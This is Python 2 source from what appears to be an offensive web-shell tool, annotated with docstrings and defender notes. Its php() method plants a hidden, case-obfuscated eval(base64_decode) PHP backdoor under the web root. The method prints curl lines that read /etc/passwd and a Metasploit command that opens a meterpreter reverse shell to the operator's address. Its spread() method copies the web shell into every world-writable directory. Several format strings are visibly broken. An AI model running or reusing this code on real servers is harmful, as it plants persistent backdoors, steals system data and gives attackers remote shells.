def php(self, ip, ourIP):
    """Drop a PHP ``eval()`` backdoor file into a world-writable directory under the web root.

    Every shell command below is sent to the remote host through
    ``make_request.get_page_source`` (the already-established web shell);
    nothing is executed locally. The code is Python 2 (``raw_input``,
    ``str``-based ``b64encode``).

    Args:
        ip: not referenced in this method (kept for the caller's interface).
        ourIP: address substituted as LHOST in the printed Metasploit example.

    Returns:
        None. Progress is printed with ``cprint``; the side effect is a new
        (or cloned-then-appended) ``.php`` file on the remote host.

    Detection notes for defenders, all derived from the commands below: the
    file lands in a directory matching ``find -perm -0002 -type d`` (world-
    writable) under the document root, its name is a dot-prefixed random
    8-character ``.php`` name, and a short ``<? ... ?>`` tag calling
    ``eval(base64_decode(...))`` in randomised letter case is *appended* to
    it, so the rest of the file may look like a legitimate existing file.
    """
    wwwroot = linux.get_doc_root()
    # World-writable directories below the docroot, in random order (sort -R).
    cmd = 'find {0} -depth -perm -0002 -type d | sort -R '.format(wwwroot)
    folder = make_request.get_page_source(cmd)
    if folder:
        # Only the first (randomly ordered) directory is used.
        folder = folder[0]
        cprint('\n[+] Found a writable directory: \'{1}\''.format(folder), 'green')
        # Dot-prefixed random name: hidden from a plain ``ls`` listing.
        filename = '.' + ''.join(choice(string.ascii_letters + string.digits) for x in range(8)) + '.php'
        cprint('[+] Filename: \'{1}\''.format(filename), 'green')
        location = '{0}/{1}'.format(folder, filename)
        # All regular files under the docroot, offered as templates to copy from.
        cmd = 'find {0} -type f -print'.format(wwwroot)
        files = make_request.get_page_source(cmd)
        cprint('[i] Select a file to \'clone\' (or \'0\' to skip):', 'green')
        cprint(' 0.) Don\'t close - create new', 'green')
        path = []
        c = 0
        for file in files:
            path.append(file)
            c += 1
            cprint('{0:2d}.) {1}'.format(c, file), 'green')
        # Prompt until an integer in [0, c] is entered; non-numeric input is ignored.
        while True:
            try:
                clone = int(raw_input(colored('[>] Which file to use? [0-{0}: '.format(c))))
                if 0 <= clone <= c:
                    break
            except ValueError:
                pass
        if clone != 0:
            # Start from a copy of the chosen file; the tag is appended to it below.
            cmd = 'cp -f {0} {1}'.format(path[int(clone) - 1], location)
            make_request.get_page_source(cmd)
        cprint('[+] Creating our \'evil\' file: \'{0}\''.format(location), 'green')
        # Random 6-letter GET parameter name that will carry the PHP code.
        parameter = ''.join(choice(string.ascii_lowercase) for x in range(6))
        # product() enumerates every upper/lower-case spelling; one is picked at
        # random, so a byte-exact, case-sensitive signature for these strings
        # will not match -- detection must compare case-insensitively.
        casePayload = choice(map(''.join, product(*((c.upper(), c.lower()) for c in 'eval'))))
        caseShell = choice(map(''.join, product(*((c.upper(), c.lower()) for c in 'php eval(base64_decode'))))
        payload = "{0}($_GET['{1}'].';');".format(casePayload, parameter)
        # .format() on the base64 text is a no-op: base64 output contains no braces.
        payloadEncoded = b64encode(payload).format(payload)
        evilFile = "<?{0}(\"{1}\")); ?>".format(caseShell, payloadEncoded)
        # Appended with >>, so a cloned file keeps its original content.
        cmd = 'echo \'{0}\' >> \"{1}\"'.format(evilFile, location)
        make_request.get_page_source(cmd)
        cprint('[+] Done!', 'blue')
        # Directory path relative to the docroot, i.e. the URL path prefix.
        uri = folder[len(wwwroot):]
        #>>> '/'.join('https://localhost/html/shell.php'.split('/', 3)[:3])
        #'https://localhost'
        # scheme://host part of the target URL (see the example above).
        url = '/'.join(getargs.url.split('/', 3)[:3])
        # NOTE(review): the template shows '(unknown)' where the dropped file
        # name would be expected; ``filename=`` is passed but not referenced in
        # the visible text -- verify against the upstream source.
        example = """Example: curl "{url}{uri}/(unknown)?{parameter}=phpinfo()" curl "{url}{uri}/(unknown)?{parameter}=require(\'/etc/passwd\')" curl 
"{url}{uri}/(unknown)?{parameter}=system(\'/sbin/ifconfig\')" msfcli exploit/unix/webapp/php_eval RHOST={url} RPORT=80 PHPURI={uri}/(unknown)?{parameter}=\!CODE\! PAYLOAD=php/meterpreter/reverse_tcp LHOST={ourIP} LPORT=4444 E""".format(
            url=url, uri=uri, filename=filename, parameter=parameter, ourIP=ourIP,)
        cprint(example, 'green')
    else:
        cprint('\n[!] Unable to find a writable directory', 'red')
def writable(self):
    """List world-writable directories below the remote document root.

    Runs ``find <docroot> -depth -perm -0002 -type d`` on the remote host via
    ``make_request.get_page_source`` and prints each result, numbered from 1.
    The result list is also stored on ``self.writable``.

    NOTE(review): assigning ``self.writable`` rebinds the instance attribute
    over this method's name, so a later ``self.writable()`` call on the same
    instance would hit the list, not the method -- confirm this is intended.
    """
    cmd = "find {0} -depth -perm -0002 -type d".format(linux.get_doc_root())
    self.writable = make_request.get_page_source(cmd)
    if self.writable:
        c = 1
        for path in self.writable:
            cprint('{0:2d}.) {1}'.format(c, path), 'green')
            c += 1
    else:
        cprint('\n[!] Didn\'t find any wriable directories', 'red')
def writable(self):
    """List world-writable directories below the remote document root.

    Same logic as the preceding ``writable`` definition (this duplicate
    differs only in line wrapping of the ``format`` call): runs
    ``find <docroot> -depth -perm -0002 -type d`` remotely, stores the
    lines on ``self.writable`` and prints them numbered from 1.

    NOTE(review): the assignment shadows the method name on the instance;
    a second ``self.writable()`` call on the same object would fail -- verify.
    """
    cmd = "find {0} -depth -perm -0002 -type d".format(
        linux.get_doc_root())
    self.writable = make_request.get_page_source(cmd)
    if self.writable:
        c = 1
        for path in self.writable:
            cprint('{0:2d}.) {1}'.format(c, path), 'green')
            c += 1
    else:
        cprint('\n[!] Didn\'t find any wriable directories', 'red')
def spread(self):
    """Copy the current web-shell file into every world-writable directory under the docroot.

    The shell's file name comes from the last path segment of ``getargs.url``
    when the request method is ``post``; otherwise the operator is prompted
    for it. A single remote command then pipes ``find -perm -0002 -type d``
    into ``xargs -n 1 cp -v``; the lines returned are ``cp -v``'s per-copy
    output, and their count is reported as the number of paths written.

    Detection note: the observable artifact is several byte-identical copies
    of one file appearing in world-writable directories at the same time.
    """
    provided_shell_name = raw_input(colored('\n[?] Current shell name: ', 'green'))
    shell_name = getargs.url.split('/')[-1] if getargs.method == 'post' else provided_shell_name
    # One remote command: every world-writable directory receives a copy.
    cmd = 'find {0} -depth -perm -0002 -type d | xargs -n 1 cp -v {1}'.format(linux.get_doc_root(), shell_name)
    done = make_request.get_page_source(cmd)
    if done:
        # len(done) == number of "cp -v" output lines, i.e. copies made.
        success = '\n[+] {shell_name}{end} already written to {hot}{writable_length} paths'.format(
            shell_name=shell_name, writable_length=len(done))
        success += '\n[+] To check these paths type @enum writable'
        cprint(success, 'blue')
    else:
        cprint('\n[!] Something went wrong while spreading shell', 'red')